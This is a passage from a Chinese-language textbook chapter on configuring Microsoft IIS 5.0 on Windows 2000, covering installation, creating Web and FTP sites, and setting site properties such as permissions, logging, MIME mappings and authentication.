§　Kerberos 5 身份验证协议相容性：IIS 已完全集成了 Microsoft? Windows 2000 中实现的 Kerberos 5 验证协议，从而允许用户在运行 Windows 的计算机之间传递验证凭据。
§　证书存储：IIS 证书存储目前已与 Windows CryptoAPI 存储集成在一起。Windows Certificate Manager 提供单一入口，允许用户存储、备份和配置服务器证书。
§　Fortezza：IIS 5.0 支持通常称为 Fortezza 的美国政府安全标准。这一标准通过一种加密机制保证消息的安全性、完整性、验证以及对消息、组件和系统的访问控制，从而能满足美国国防部消息系统安全性结构的要求。可以通过服务器和浏览器软件或者 PCMCIA 卡硬件来实现这些功能。

14.1.2 可管理性
§　重新启动 IIS：现在不用重新启动计算机就可以重新启动 Internet 服务。
§　备份和还原 IIS：可以备份和存储 metabase 设置，以便更容易的返回已知的安全状态。
§　进程帐户：提供关于单个 Web 站点如何使用服务器中 CPU 资源的信息。此信息在判断哪些站点正在不成比例地使用 CPU 资源或者具有不正常的脚本和 CGI 进程时非常有用。
§　进程限制：可以限制 CPU 在处理单个 Web 站点的进程外 ASP、ISAPI 以及 CGI 应用程序的时间百分比。另外，还可以终止和重新启动运行失常的进程。
§　改进的自定义错误消息：当 Web 站点出现 HTTP 错误时，目前管理员可以向用户发送消息。同时，通过使用 500-100.asp 自定义错误消息，还可以包含详细的 ASP 错误进程功能。可以使用 IIS 5.0 提供的自定义错误，也可创建自己的错误。
§　配置选项： 可以在站点、目录或文件级别设置"读取"、"写入"、"执行"、"脚本"以及 FrontPage Web 操作的权限。

§　远程管理：IIS 5.0 已经包含一些基于 Web 的管理工具，可以从任何平台的几乎所有浏览器上远程管理用户的服务器。利用 IIS 5.0，可以设置称为操作员的管理帐户，使之具备一定的 Web 站点管理权限，帮助分担一部分管理任务。
§　终端服务：终端服务属于 Windows 2000 的一种功能，允许用户在终端以及在个人计算机和其它计算机桌面上运行的终端模拟程序上运行 32 位的 Windows 应用程序。终端服务事实上允许任何桌面运行服务器上的应用程序。这样，用户就可以远程管理 IIS 等 Windows 2000 服务，包括从旧的 PC、甚至从非 PC 设备（如安装了兼容客户软件的 UNIX 工作站 - 非 Windows 客户端设备要求第三方组件软件）进行管理，好象用户就在服务器控制台前一样。
§　集中管理：IIS 使用 Microsoft Management Console (MMC) 时的管理工具。MMC 支持管理员用于管理服务器的程序，称为管理单元。可以从运行 Windows 2000 Professional 的计算机上使用 IIS 管理单元，管理在 Windows 2000 Server 上运行 Internet 信息服务的 Intranet 上的计算机。

14.1.3 可编程性
§　Active Server Pages：可以使用服务器端的脚本和组件创建动态内容，从而创建与浏览器无关的动态内容。
§　新的 ASP 功能：Active Server Pages 新增和改进了一些功能，这样有助于改善性能以及简化服务器端的脚本。
§　应用程序保护：IIS 5.0 为 Web 应用程序提供更大的保护以及更强的可靠性。默认情况下，IIS 在公共或"共用"进程（即与核心 IIS 进程隔离的进程）中运行应用程序。而且还可以隔离执行关键任务的应用程序，这些程序应该在核心 IIS 以及共用进程之外运行。
§　ADSI 2.0：在 IIS 5.0 中，管理员和应用程序开发者可以向现有的 ADSI 提供者添加自定义对象、属性和方法，从而进一步增大了管理员配置站点的灵活性。

    14.1.4 ASP的新功能
§　各种标准的基础：Microsoft Internet 信息服务 5.0 版符合 HTTP 1.1 标准，包括 PUT 和 DELETE 等功能以及自定义 HTTP 错误消息的能力，并支持自定义的 HTTP 头。
§　多个站点，一个 IP 地址：由于支持主机头，因此，可以用一个 IP 地址在运行 Microsoft Windows 2000 Server 的单台计算机上维护多个 Web 站点。这对于 Internet 服务提供商以及维护多个站点的公司 Intranet 非常有用。
§　Web 分布式创作与版本管理 (WebDAV) ：允许远程作者通过 HTTP 连接创建、移动或删除服务器上的文件、文件属性、目录和目录属性。
§　新闻和邮件：可以使用 SMTP 服务以及 NNTP 服务设置与 IIS 一同工作的 Intranet 邮件和新闻服务。
§　PICS 分级：可以将 Platform for Internet Content Selection (PICS) 分级应用于内容仅适合于成人的站点。
§　FTP 重新启动：如果在数据传输中出现中断，现在可以恢复"文件传输协议"文件下载，而不必再次下载整个文件。
§　HTTP 压缩：可以更快地在 Web 服务器与启用了压缩的客户之间进行页面传输。压缩和缓存静态文件并对动态生成的文件按需进行压缩。

    14.2 WEB站点和FTP站点的配置与管理
    14.2.1 安装 IIS
    步骤1 单击"开始"，指向"设置"，单击"控制面板"，然后启动"添加/删除程序"应用程序。
    步骤2 选择"配置 Windows"，单击"组件"按钮，然后按照屏幕提示安装、删除或添加 IIS 组件，安装完毕后 如图 14.1。
    注意 ：如果升级到 Windows 2000，那么只有在以前版本的 Windows 中安装了 IIS，IIS 5.0 才被默认安装。

14.2.2 WEB站点和FTP站点的介绍
    Web 和 FTP 站点
    无论是在 Intranet 还是在 Internet 上，都可以按三种方式在运行 Windows 2000 的单个计算机上创建多个 Web 和 FTP 站点：
§　将端口号附加到 IP 地址。
§　使用多个 IP 地址，每个都有自己的网络适配卡。
§　通过使用主机头名将多个域名和 IP 地址指派给一个网络适配卡。
    以下示例说明了 Intranet 方案如图 14.2，此处系统管理员已将 Windows 2000 Server 和 IIS 一并安装在公司服务器上，这将导致产生一个默认的 Web 站点，即 http://CompanyServer。然后系统管理员将创建两个"额外的"Web 站点，分别对应于两个部门：市场部和人力资源部。

虽然位于同一计算机上，但"CompanyServer"、"市场部"和"人力资源部"看起来都象是唯一的 Web 站点。这些部门站点具有相同的安全选项，就好象它们存在于独立的计算机上那样，这是因为每个站点均有其自己的访问和管理权限设置。此外，管理任务可以分配给每个部门的成员。关于维护多个站点的详细信息，请参阅"关于名称解析"中的将主机头名、地址和端口分配给 Web 站点。
当创建大量站点时，请一定考虑硬件的限制并根据需要进行升级。
    站点的属性和属性继承
    属性是可以在 Web 站点上设置的值。例如，可以使用 Internet 信息服务管理单元将指派到默认 Web 站点的 TCP 端口号从默认值 80 更改为另一个号。在属性页中显示站点属性并将其存储在称为"metabase"的数据库中。
    在 IIS 的安装过程中，将默认值指派给属性页中的各种属性。可以在 IIS 中使用默认设置，也可以自定义这些设置以适应自己 Web 发布的需要。通过调整默认设置，可以提供附加值、更好的性能以及更高的安全性。
    可以在站点级、目录级或文件级设置属性。将自动使用高级别（如站点级）设置，或由低级别（如目录级）设置"继承"但仍可以在低级别单独编辑。一旦在单独站点、目录或文件中更改了属性，日后对主默认值的更改将不会自动覆盖单独设置。相反，用户将接收到询问是否要更改单独站点、目录或文件以使其与新默认值匹配的警告信息。

  某些属性具有采用列表形式的值。例如，当用户未在 URL 中指定文件时，默认文档值可以是要加载的文档列表。自定义错误消息、TCP/IP 访问控制、脚本映射和 MIME 映射是以列表格式存储的属性的其他实例。虽然这些列表有很多项，但 IIS 仍将整个列表作为一个单个属性来处理。如果在目录中编辑列表并在站点级进行了全局更改，则目录级的列表将被来自站点级的新列表所替换；列表不会合并。同样，具有列表值的属性只在主级别或默认值已更改的站点或目录显示其列表。如果列表值是继承的默认值，则将不显示。
    筛选器以列表格式显示，但不作为列表处理。如果在站点级添加筛选器，则新筛选器将与主级别的筛选器列表合并。如果两个筛选器具有相同的优先级设置，则主级别的筛选器将在站点级筛选器之前进行加载。
    如果需要修改默认属性并且正在创建几个 Web 或 FTP 站点，则可以编辑默认值以便所创建的每个站点都将继承自定义值。有关更改所有 Web 或 FTP 站点默认值的详细信息，请参阅更改继承的默认值。
    如图 14.3说明了用于设置所有 Web 站点属性的属性页。

Web 站点操作员
    Web 站点操作员是一组在单独 Web 站点上具有有限管理特权的特殊用户。操作员可以管理只影响其各自站点的属性。他们无权访问影响 IIS、维护 IIS 的 Windows 服务器计算机或网络的属性。
例如，托管大量不同公司站点的 ISP 可以将每个公司的代表指派为每个单独公司 Web 站点的操作员。这种分布式服务器管理方法具有以下优点：
§　每个操作员可以作为站点管理员并根据需要更改或重新配置 Web 站点。例如，操作员可以设置 Web 站点访问权限，启用记录，更改默认文档或页脚， 设置内容截止日期和启用内容分级特性。
§　不允许 Web 站点操作员更改 Web 站点的标识、配置匿名用户名或密码、限制带宽、创建虚拟目录或更改其路径或更改应用程序隔离。
§　由于操作员较 Web 站点管理员具有更多受限制的特权，故他们无法远程浏览文件系统，因此也就不能设置目录和文件中的属性，除非使用 UNC 路径。
    远程管理站点
    由于不是总可以方便地在运行 IIS 的计算机上执行管理任务，因此可使用两个远程管理选项。如果通过 Internet 或代理服务器与用户的服务器连接，就可以使用基于浏览器的 Internet 服务管理器 (HTML) 更改站点上的属性。如果处于"Intranet"上，就可以使用 Internet 服务管理器 (HTML) 或宿于 Microsoft 管理控制台 (MMC)上的 Internet 信息服务管理单元。 虽然 Internet 服务管理器 (HTML) 提供很多与管理单元相同的特性，但却不能使用 Internet 服务管理器 (HTML) 对要求与 Windows 实用程序（如证书映射）协调的属性进行更改。

注意： 在以前的版本中，Internet 信息服务管理单元称为 Internet 服务管理器。
    Internet 服务管理器 (HTML) 使用作为管理 Web 站点列出的 Web 站点访问 IIS 属性。但安装了 IIS 后，将随机选择一个介于 2,000 和 9,999 之间的端口号并将其指派给该 Web 站点。只要端口号附加到地址，站点将对安装在计算机上的所有域名的 Web 浏览器请求作出响应。如果使用基本验证，则将在到达站点时要求管理员提供用户名和密码。只有 Windows Administrators 组成员才可以使用该站点。Web 站点操作员还可以远程管理 Web 站点。有关如何使用 Internet 服务管理器 (HTML) 或 Internet 信息服务管理单元的详细信息，请参阅远程管理。
    注意：虽然 Internet 服务管理器的 HTML 版本与其管理单元版本具有很多相同的功能，HTML 版本是沿着 Web 页的线路设计的。不支持鼠标右键单击。很多熟悉的工具栏按钮或选项卡头将作为链接显示在左边的窗格中。由于这些差异，文档中的指示不可能总是准确地描述 Internet 服务管理器 (HTML) 中执行的步骤。
    当执行远程管理任务时，联机文档同样有效。要访问该文档，请启动浏览器并键入 http://servername/iishelp/iis/misc/default.asp，其中，servername 代表运行 IIS 的计算机的名称。
    可使用网络连接上（如LAN、PPTP 或拨号）的 Microsoft 终端服务远程管理 IIS。终端服务不要求在远程计算机上安装 Microsoft 管理控制台 (MMC) 或 IIS 管理单元。默认情况下，终端服务文档安装在 C:\Winnt\Help\TermSrv.chm 和 C:\Winnt\Help\TermCli.chm 下。

FTP 重新启动
    FTP 重新启动说明下载文件时出现断开网络连接的问题。支持 FTP 重新启动的客户端只需使用 REST 命令重新建立其 FTP 连接，文件传输便能自动找到断点。
    注意：当使用 FTP 来下载通配符请求 (MGET)、将文件上载到服务器 (PUT) 或下载大于 4G 字节的文件时，将不启用 IIS 5.0 的 FTP 重新启动执行。
    MIME 映射
    多用途网际邮件扩充协议 (MIME) 是一个 Internet 标准，它给 Web 浏览器提供查阅多格式文件的方法。把在 Windows 2000 上默认安装的注册文件类型列于 Internet 信息服务属性页的"文件类型"对话框中。
    可以在计算机、Web 站点、虚拟目录、目录或文件级别配置 MIME 映射。要在计算机级别配置 MIME 映射，请使用 Internet 信息服务属性页。要在其他级别配置 MIME 映射，请使用 HTTP 头属性页。
    注意： 在计算机级配置的 MIME 映射不会自动覆盖在低级别设置的映射。

14.2.3 建立 WEB 和 FTP 站点
    14.2.3.1 在 Web 站点上发布内容
    步骤1 为 Web 站点创建主页。
    步骤2 将主页文件命名为 Default.htm 或 Default.asp。
    步骤3 将主页复制到 IIS 的默认 或指定的Web 发布目录中。默认 Web 发布目录也称为主目录，安装程序提供的位置是 \Inetpub\Wwwroot。
    步骤4 在 Internet 信息服务管理单元中选择计算机或站点，然后单击"动作"按钮。
    步骤5 单击"新建"，然后单击"Web 站点"启动站点向导 如图 14.4。

    步骤6 首先输入 Web 新站点的标识信息，然后单击"下一步"，在此输入 Web 站点的 IP 地址和 TCP 端口地址。如果通过主机头文件将其他站点添加到单一 IP 地址，必须指定主机头文件名称，
    如图 14.5。

    然后单击"下一步"输入站点的主目录路径。
    如图 14.6。

步骤7 单击"下一步"选择 Web 站点的访问权限 如图 14.7，单击"下一步"完成设置。
    步骤8 如果网络具有名称解析系统（通常为 DNS），那么访问者可以简单地在其浏览器地址栏中键入计算机名到达站点。如果网络没有名称解析系统，那么访问者必须键入计算机的数字 IP 地址。
    注意： 在站点向导中，"全部未指定"表示指派给计算机但并未指派给特定站点的 IP 地址。默认的 Web 站点使用尚未指派给其他站点的所有 IP 地址。只能设置一个站点使用未指派的 IP 地址。如果允许匿名用户访问则需要选中"允许匿名用户访问 Web 站点"附选项。

14.2.4 在 FTP 站点上发布内容
    步骤1 将文件复制或移动到默认的 FTP 发布目录。安装程序提供的默认目录是 \Inetpub\Ftproot。
    步骤2 在 Internet 信息服务管理单元中选择计算机或站点，然后单击"动作"按钮。
    步骤3 单击"新建"，然后单击 "FTP 站点"启动站点向导类似图 14.4。
    步骤4 首先输入 FTP 新站点的标识信息，然后单击"下一步"，在此输入 FTP 站点的 IP 地址和 TCP 端

口地址。，类似图 14.5。然后单击"下一步"输入FTP站点的主目录路径，类似图 14.6。
    步骤5 单击"下一步"选择 FTP 站点的访问权限类似图 14.7，单击"下一步"完成设置。
    步骤6 如果网络具有名称解析系统（通常为DNS），那么访问者可以在其浏览器地址栏中键入后面跟有计算机名的 ftp:// 到达站点。如果没有，那么访问者必须键入 ftp:// 和计算机的数字 IP 地址。
    在 Web 和 FTP 站点建立完毕后，它们自动开始运行，如图 14.8。

14.2.5 启动和停止站点
    默认情况下，站点将在计算机重新启动时自动启动。停止站点将停止 Internet 服务，并从计算机内存中卸载 Internet 服务。暂停站点将禁止 Internet 服务接受新的连接，但不影响正在进行处理的请求。启动站点将重新启动或恢复 Internet 服务。
    步骤1 在 Internet 信息服务管理单元中，选择要开始、停止或暂停的站点。
    步骤2 单击工具栏中的"开始"、"停止"或"暂停"按钮。
    注意：如果站点意外停止，Internet 信息服务管理单元将无法正确显示服务器的状态。重新启动之前，请单击"停止"，而后单击"开始"重新启动站点。

14.2.6 重新启动 IIS
    在 IIS 5.0 中，可以停止并重新启动所有 IIS 管理单元中的 Internet 服务，这使得在应用程序运行不正常或变得不可用时无需重新启动计算机。
    步骤1 在 Internet 信息服务管理单元中，选择内容窗格中的"计算机"图标，然后单击"动作"按钮。
    步骤2 单击"动作"按钮并选择"重新启动 IIS"。
    步骤3 从下拉菜单中，选择"重新启动 Internet 服务"、"停止 Internet 服务"、"启动 Internet 服务"或"重新启动 计算机名称"。
注意
§　重新启动 Internet 服务必须使用上述方法，而不用 Windows 2000 服务管理单元。由于多个 Internet 服务在一个进程中运行，因此 Internet 服务的关闭和重新启动与其他 Windows 服务有所不同。为了按计划重启，或与第三方或自定义工具集成，这里提供了命令行方式的 IIS 管理单元 重新启动功能：Iisreset.exe。请参阅以下命令行用法和参数。
§　重新启动将停止所有的 Drwtsn32.exe、Mtx.exe 和 Dllhost.exe 进程，目的是重新启动 Internet 服务。 无法使用基于浏览器的 Internet 服务管理器 (HTML) 来重新启动 IIS。

    14.3 设置 WEB 和 FTP 属性
    14.3.1 Web 站点属性
    14.3.1.1 Web 站点属性页
    如图 14.9 在 Web 站点的主属性页用于设置 Web 站点的标识参数、连接、启用日志纪录。

    1. Web站点标识
    单击"高级"按钮配置 IP 地址、TCP 端口号和主机头名称。
    IP 地址
    对于要在该框中显示的地址，必须已经在"控制面板"中定义为在该计算机上使用。详细信息，请参阅 Windows 文档。如果不指定特定的 IP 地址，该站点将响应所有指定到该计算机并且没有指定到其他站点的 IP 地址，这将使该站点成为默认 Web 站点。
    TCP 端口
    确定正在运行服务的端口。默认情况下为端口 80。可以将该端口更改为任意唯一的 TCP 端口号，但是，客户必须事先知道请求该端口号，否则其请求将无法连接到用户的服务器。端口号是必需的，而且该文本框不能置空，详细信息，请参阅命名 Web 站点。
    SSL 端口
    要指定安全套接字层 (SSL) 加密使用的端口，请在该框中键入端口号。可以将该端口号更改为任意唯一的端口号，但是，客户必须事先知道请求该端口号，否则其请求将无法连接到用户的服务器。必须有 SSL 端口号，该文本框不能置空，详细信息，请参阅加密。

    2. 连接
    无限
    选择该选项允许同时发生的连接数不受限制。
    限制到
    选择该选项限制同时连接到该站点的连接数。
    在该对话框中，键入允许连接的最大数目。
    连接超时
    设置服务器断开未活动用户的时间（以秒为单位）。这将确保 HTTP 协议在关闭连接失败时可关闭所有连接。
    启用保持 HTTP 激活
    允许客户保持与服务器的开放连接，而不是使用新请求逐个重新打开客户连接。禁用保持 HTTP 激活会降低服务器性能。默认情况下启用保持 HTTP 激活。详细信息，请参阅启用保持 HTTP 激活。

    3. 启用日志记录
    选择该选项将启用 Web 站点的日志记录功能，该功能可记录用户活动的细节并以用户选择的格式创建日志。启用日志记录后，请在"活动日志格式"列表中选择格式。
    活动日志格式：
    Microsoft IIS 日志格式 固定 ASCII 格式。
    ODBC 日志（仅在 Windows 2000 Server 中提供）
    记录到数据库的固定格式。
    W3C 扩充日志文件格式 可自定义的 ASCII 格式，默认情况下选择该格式。必须选择该格式才能使用"进程帐号"。
    要配置日志文件创建选项（如每周，或按文件大小），或者配置 W3C 扩充日志记录或 ODBC 日志记录的属性，请单击"属性"。

14.3.1.2 Web 站点操作员
    使用该属性表可指定拥有该站点操作员权限的 Windows用户帐户。
    添加
    要将用户帐户添加到操作员列表中，请单击"添加"。
    删除
    要删除目前选择的用户帐户，请单击"删除"。要选择多个帐户，请在选择单个帐户时按住 CTRL 键，或者选择一系列帐户时按住 SHIFT 键。

14.3.1.3 性能属性页
    使用该属性页如图 14.10设置影响内存和带宽使用的属性。
    性能调整
    将该设置调整为期望站点每日连接的数目。如果该数目设置得略小于实际连接数，则连接速度会更快并且服务器性能也将提高。如果该数目设置得远远大于实际连接数，则将浪费服务器内存并降低服务器的整体性能。
    启用带宽限制
    选择该选项以限制 Web 站点使用的带宽。仅对该 Web 站点而言，此处键入的带宽值将覆盖在计算机级设置的值，尽管该值大于计算机级设置的值。
    启用进程限制
    选择该选项以限制该 Web 站点可用于处理应用程序之外的 CPU 处理时间的百分比。如果选择了该框但未选择"强制性限制"，则唯一的后果将是在超过指定限制时把事件写入事件记录中。

14.3.1.4 ISAPI 过滤器属性页
    使用该属性页设置 ISAPI 过滤器的选项。ISAPI filter 是在处理 HTTP 请求过程中响应事件的一个程序。
    要添加 ISAPI 过滤器，请单击"添加"按钮。
    要删除 ISAPI 过滤器，请选择它并单击"删除"按钮。
    要更改 ISAPI 过滤器的属性，请选择它并单击"编辑"按钮。
    要启用 ISAPI 过滤器，请选择它并单击"启用"按钮。
    要禁用 ISAPI 过滤器，请选择它并单击"禁用"按钮。
    要更改 ISAPI 过滤器的执行顺序，请选择它并单击向上或向下箭头。只能更改具有相同优先级的过滤器的装载顺序。

    14.3.1.5 主目录属性页
    使用该属性页如图14.11可以更改 Web 服务器主目录的位置（默认为 /Wwwroot）
    1.此计算机上的目录或另一计算机上的共享位置
    脚本资源访问
    若要允许用户访问已经设置了"读取"或"写入"权限的资源代码，请选中该选项。资源代码包括 ASP 应用程序中的脚本。详细信息，请参阅设置 Web 服务器权限。
    读取
    若要允许用户读取或下载文件（目录）及其相关属性，请选中该选项。
    写入
    若要允许用户将文件及其相关属性上载到服务器上已启用的目录，或者更改可写文件的内容，请选中该选项。"写入"操作只能在支持 HTTP 1.1 协议标准的 PUT 功能的浏览器中进行。

目录浏览
    若要允许用户查看该虚拟目录中文件和子目录的超文本列表，请选中该选项。虚拟目录不会显示在目录列表中，用户必须知道虚拟目录的别名。
    注意：如果用户试图访问文件或目录并且满足以下两个条件，Web 服务器将在用户 Web 浏览器中显示"禁止访问"错误消息。
    禁用目录浏览。
    用户未指定文件名，如 Filename.htm。
    日志访问
    若要在日志文件中记录对该目录的访问，请选中该选项。只有启用了该 Web 站点的日志才会记录访问。详细信息，请参阅记录站点活动。
    索引此资源
    若允许 Microsoft Indexing Service 将该目录包含在 Web
    站点的全文本索引中，请选中该选项。

应用程序设置
    基于 Web 的 IIS 应用程序由其所在的目录结构定义。详细信息，请参阅关于应用程序。若要创建应用程序，请参阅创建应用程序。
    执行许可
    此项权限可以决定对该站点或虚拟目录资源进行何种级别的程序执行。详细信息，请参阅设置 Web 权限。
    无只允许访问静态文件，如 HTML 或图像文件。
    纯脚本只允许运行脚本，如 ASP 脚本。
    脚本和可执行程序 可以访问或执行各种文件类型。
    应用程序保护
    选择运行应用程序的保护方式：与 Web 服务在同一进程中运行（低）、与其他应用程序在独立的共用进程中运行（中）、或者在与其他进程不同的独立进程中运行（高）。

2. 重定向到 URL
    选中"重定向到 URL"后将出现这些属性。
    客户将被送到
    上面输入的准确 URL
    将虚拟目录重定向到目标 URL，但不会添加原始 URL
    的任何其他部分。使用该选项可以将整个虚拟目录重定向到一个文件。例如，若要将对"/scripts"虚拟目录的所有请求都重定向到主目录中的文件 Default.htm，请在"重定向到"文本框中键入"/Default.htm，然后选中该选项。
    在这之下的目录
    将父目录重定向到子目录。例如，若要将主目录（由 /
    指定）重定向到子目录"/newhome"，请在"重定向到"文本框中键入"/newhome"，然后选中该选项。如果不选中该选项，Web 服务器会继续将父目录映射为其自身。
    此资源的永久重定向
    将以下消息发送到客户："301 永久重定向"。重定向被认为是临时的，而且客户浏览器收到以下消息："302
临时重定向"。某些浏览器会将"301 永久重定向"消息作为信号来永久地更改 URL，如书签。
    重定向变量
    使用重定向变量可以传递部分原始 URL 到目标 URL。详细信息，请参阅重定向引用。
    重定向通配符
    使用重定向通配符可以匹配原始 URL 中任意数量的字符。

14.3.1.6 文档属性页
    使用该属性页定义站点的默认 Web 页和将页脚附加到站点的文档中。
    启用默认文档
§　要在浏览器请求指定文档名的任何时候提供一默认文档，请选择该复选框。默认文档可以是目录的主页或包含站点文档目录列表的索引页。
§　要添加一个新的默认文档，请单击"添加"。可以使用该特性指定多个默认文档。按出现在列表中的名称顺序提供默认文档。服务器将返回所找到的第一个文档。
§　要更改搜索顺序，请选择一个文档并单击箭头按钮。
§　要从列表中删除默认文档，请单击"删除"。
    启用文档页脚
    要自动将一个 HTML 格式的页脚附加到 Web 服务器所发送的每个文档中，请选择该选项。
    页脚文件不应是一个完整的 HTML 文档。而应该只包括需用于格式化页脚内容外观和功能的 HTML 标签。
    要指定页脚文件的完整路径和文件名，请单击"浏览"。

14.3.1.7 目录/文件安全属性表
    使用该属性表如图 14.12设置 Web 服务器的安全特性。
    匿名访问和验证控制
    要配置 Web 服务器的验证和匿名访问功能，请单击"编辑"。使用该功能可配置 Web 服务器在授权访问受限制内容之前确认用户的身份。
    但是，首先必须创建有效的 Windows 用户帐户然后配置这些帐户的 Windows 文件系统 (NTFS) 目录和文件访问权限后，服务器才能验证用户的身份。详细信息，请参阅关于验证。
    IP 地址及域名限制
    （该功能仅在安装有 Windows 2000 Server 的设备中可用。）
    要允许或阻止特定用户、计算机、计算机组或域访问该 Web 站点、目录或文件，请单击"编辑"。详细信息，请参阅关于访问控制。

安全通信
    要使用新证书向导创建服务器证书请求，请单击"服务器证书"。安装有效服务器证书后才能使用 Web 服务器的安全通信功能。详细信息，请参阅证书。
    要配置 Web 服务器的安全套接字层 (SSL) 安全通信功能，请单击"编辑"。可以执行以下操作：
§　要求用户建立安全（加密）链接以便连接到用户的目录或文件。
§　配置 Web 服务器的客户证书映射和验证功能。
§　创建和配置证书信任列表 (CTL)。
    启用 Windows 目录服务匹配器
    （该选项只在主属性级并且服务器是 Windows 2000 域的成员时才可用。）
要使用目录服务 (DS) 客户证书映射而不是一对一或多对一映射，请选择该选项。有关客户证书映射的详细信息，请参阅将客户证书映射到用户帐户。

14.3.1.8 HTTP 头属性页
    使用 HTTP 头属性页 如图 14.13以设置返回到浏览器 HTML 页头部中的值。
    启动内容失效
    选择该复选框以包括失效信息。在对时间敏感的资料中包括日期，诸如专门报价或事件公告。浏览器将当前日期与失效日期进行比较，以便确定是显示高速缓存页还是从服务器请求一更新过的页面。

    自定义 HTTP 头
    使用该属性将自定义 HTTP 头从 Web 服务器发送到客户浏览器。自定义 HTTP 头可用来发送当前 HTML 规范中尚不支持的指令，诸如产品发布时 IIS 尚不支持的更新的 HTML 标签。例如，可以使用自定义 HTTP 头允许客户浏览器高速缓存页但却防止代理服务器高速缓存该页。
    要使 Web 服务器发送自定义 HTTP 头，请单击"添加"，然后在"添加自定义 HTTP 头"对话框中键入头的名称和值。
    要编辑现存的自定义 HTTP 头，请选择自定义 HTTP 头并单击"编辑"。
    要终止发送自定义 HTTP 头，请选择自定义 HTTP 头并单击"删除"。
    内容分级
    使用内容分级在 Web 页的 HTTP 头中嵌入描述性标签。诸如 Microsoft Internet Explorer 3.0 版本或更高版本的浏览器将检测内容分级以帮助用户识别可能有异议的 Web 内容。
    要为 Web 站点、目录或文件设置内容分级，请单击"编辑分级"。

    MIME 映射
    选择"文件类型"按钮配置多用途网际邮件扩充 (MIME) 映射。
    这些映射设置各种 Web 服务返回到浏览器的文件类型。将在"文件类型"对话框中列出以默认方式安装在 Windows 中的注册文件类型。在"文件类型详细信息"框中将列出所选文件类型的文件类型扩展名和 MIME 映射。
    要配置其他 MIME 映射，请单击"文件类型"对话框中的"新类型"按钮。
    1. 在"文件类型"对话框中，键入与"关联扩展名"框中相关联的扩展名。
    2. 在"内容类型 (MIME)"框中，以"mime 类型/文件扩展名"形式输入后面跟有文件名扩展名的 MIME 类型。

    要删除 MIME 映射，请在"已注册的文件的类型"框中选择文件类型并单击"删除"。

    要编辑现存的 MIME 映射，请在"已注册的文件类型"框中选择文件类型，而后单击"编辑"按钮并按要求修改"关联扩展名"和"内容类型 (MIME)"框中的内容。

    如果在主属性页中设置计算机的 MIME 映射，则计算机中的 Web 站点和目录将使用相同的映射。可以修改 Web 站点或目录的 MIME 映射，然而，如果又重新应用主属性，主属性将完全取代 Web 站点或目录已修改的属性。也就是说，属性未得到合并。

14.3.1.9 自定义错误信息属性页
    当 Web 服务器出现错误时，使用"自定义错误信息"属性页自定义发送给客户的 HTTP 错误。管理员可使用 IIS 提供的常规 HTTP 1.1 错误或详细自定义错误文件，或创建自己的自定义错误文件。
    要更改自定义错误信息的属性，请单击"编辑属性"按钮。如果输出类型是 URL，则该 URL 必须存在于本地服务器上。
    要配置自定义错误以便使用默认 HTTP 1.1 错误返回，请单击"设为默认值"按钮。要选择多个自定义错误，请在选择时按住 CTRL 键。
    14.3.1.10 FrontPage 服务器扩展
    主要由三个程序组成，分别固定执行管理、创建和查看等有用的任务。

    14.3.2 FTP 站点属性
    14.3.2.1 FTP 站点属性页
    使用此属性页如图 14.14 设置服务器的标识参数。服务器名称、域名以及 IP 地址是可选的。
    标识说明
    可以随意选取服务器的名称。此名称主要用来标识个人和组织身份。
    IP 地址
    对于显示在此框中的地址，必须先在"控制面板"中定义为可使用。详细信息，请参阅 Windows 文档。
    TCP 端口
    确定运行服务所在的端口。
    默认值是端口 21。可以将此端口更改为任意的唯一 TCP 端口号。但是，客户在请求端口号之前，必须知道这个端口号，否则，请求将无法连接到服务器。

    连接无限
    同时连接到服务器的连接数不受限制。
    限制到
    设置允许同时连接到服务器的最大连接数。
    连接超时
    设置服务器断开不活动用户前的时间。如果 HTTP 协议关闭连接失败，此选项可确保关闭所有连接。
    启用日志记录
    选择此复选框以启用 FTP 站点日志记录，它可以记录有关用户活动的详细资料，并可以创建多种格式的日志文件。启用日志之后，请在"活动的日志格式"列表中选择一种格式。格式如下所示：
§　Microsoft IIS 日志格式： 固定的 ASCII 格式。
§　W3C 扩充日志文件格式： 自定义的 ASCII 格式，默认情况下选择此格式。
§　ODBC 记录：（仅用于 Windows 2000 Server） 记录到数据库的固定格式。
    要配置创建日志文件的选项（例如，每周或按文件大小），或配置 W3C 扩充日志或 ODBC 日志的属性，请单击"属性"。
    当前会话
    单击该按钮以查看目前连接到站点的用户列表。Internet 服务管理器 (HTML) 中不提供该功能。

14.3.2.2 安全帐号属性页
    使用此属性页来控制可使用服务器的用户，并指定用于登录到计算机的匿名客户请求的帐号。
    允许匿名连接
    选择此选项以允许使用"匿名"用户名的用户登录到 FTP 服务器。详细信息，请参阅关于验证。
    用户名
    键入在匿名连接时使用的用户名。
    要查找特定 Windows 用户帐号，请单击"浏览"。
    密码
    键入匿名连接帐号使用的密码。如果选中了"允许 IIS 控制密码"选项，密码将不能更改。
    只允许匿名连接
    只允许匿名连接。选中此复选框之后，用户就不能使用用户名和密码登录。此选项可避免具有管理权限的帐号访问，而仅允许指定为匿名的帐号访问。
    允许 IIS 控制密码
    选择此选项，可以使 FPT 站点能够自动将匿名密码设置与 Windows 中的设置相同。

FTP 站点操作员
    FTP 站点操作员是一组特殊的用户，他们在各自的 FTP 站点具有有限的权限。操作员可以管理只影响自己站点的属性。操作员不能访问涉及 IIS、Windows 服务器计算机宿主 IIS 或网络的属性。详细信息，请参阅关于 Web 和 FTP 站点。
    添加
    要向操作员列表中添加用户帐号，请单击"添加"。
    删除
    要删除当前选定的用户帐号，请单击"删除"。如果想同时选定多个帐号，可以在选择每一帐号的同时按住 CTRL 键，也可以按住 SHIFT 键同时选择一个范围的帐号。

14.3.2.3 消息属性页
    使用该属性页创建自己的消息，当用户访问用户的站点时会将这些消息显示给用户。
    欢迎
    首次连接到 FTP 服务器时，将显示此文本。默认情况下此消息为空。
    退出
    客户从 FTP 服务器注销时，将显示此文本。默认情况下此消息为空。
    最大连接数
    当 FTP 服务的连接数已达到所允许的最大值时，如果客户仍试图进行连接，则显示此文本。默认情况下此消息为空。

14.3.2.4 FTP主目录属性页
    使用此属性页更改 FTP 站点的主目录或修改其属性。主目录是 FTP 站点中用于已发布文件的中心位置。在安装 FTP 服务时，会创建了一个名为 \Ftproot 的默认主目录。可以将主目录的位置更改为下列某位置：
§　此计算机上的目录。
§　另一计算机上的共享位置。出现提示时，请键入访问那台计算机所需的用户名和密码。如果要更改用户名和密码，请单击"连接为"。
    FTP 站点目录
    在此文本框中键入目录路径或目标 URL。语法必须与所选的路径类型相匹配：
